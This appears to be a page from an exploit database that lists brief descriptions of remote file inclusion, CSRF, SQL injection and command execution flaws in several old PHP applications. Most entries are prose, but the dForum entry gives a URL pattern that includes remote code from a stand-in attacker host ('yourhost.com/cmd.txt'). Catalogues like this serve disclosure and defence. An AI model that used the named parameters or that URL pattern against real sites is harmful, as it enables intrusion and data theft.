Explore Vulnerabilities

Explore all Exploits:

Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability

In the movie_cls.php file, the require_once() function includes a file whose path is taken from user-supplied input. Passing a URL in the full_path parameter causes the application to include arbitrary files from remote locations, which can be used to execute arbitrary commands on the vulnerable system.

Web Links 1.0 XSRF Vulnerability (Add Admin)

A Cross-Site Request Forgery (XSRF) vulnerability exists in Web Links 1.0, which allows an attacker to add an admin user to the application. The attacker can craft a malicious HTML form with hidden fields containing the username, password, email, and group_id of the new admin user. When the form is submitted, the application will add the user without any authentication.

My Gaming Ladder Combo System <= 7.0 Remote Command Execution Exploit

This exploit allows a remote attacker to execute arbitrary commands on a vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'command' parameter in 'stats.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious commands to the vulnerable system.

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities

This exploit works on dForum <= 1.5 by requesting vulnerable files such as about.php, admin.php, anmelden.php, closethread.php, config.php, delpost.php, delthread.php, dfcode.php, download.php, editanoc.php, forum.php, login.php, makethread.php, menu.php, newthread.php, openthread.php, overview.php, post.php, suchen.php, user.php, userconfig.php, userinfo.php and verwalten.php, using a URL of the form http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?

Simplog <= 0.93 Remote SQL Injection Exploit

Simplog is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input in the 'blogid' parameter of the 'preview.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable server.

CoreNews <= 2.0.1 Remote SQL Injection Exploit

This exploit allows an attacker to gain access to the CoreNews database by exploiting a SQL injection vulnerability in the 'preview.php' file. The exploit sends an HTTP request to the vulnerable server with a malicious payload, which then allows the attacker to extract the login and password of the database. The exploit is written in Perl and can be used to gain access to the database.

PHPSurveyor <= 0.995 'save.php/surveyid' Remote Commands Execution

PHPSurveyor contains a remote code execution vulnerability. An attacker can exploit it by sending a specially crafted HTTP request to the vulnerable application, which can allow the attacker to execute arbitrary code on the vulnerable system.

Recent Exploits: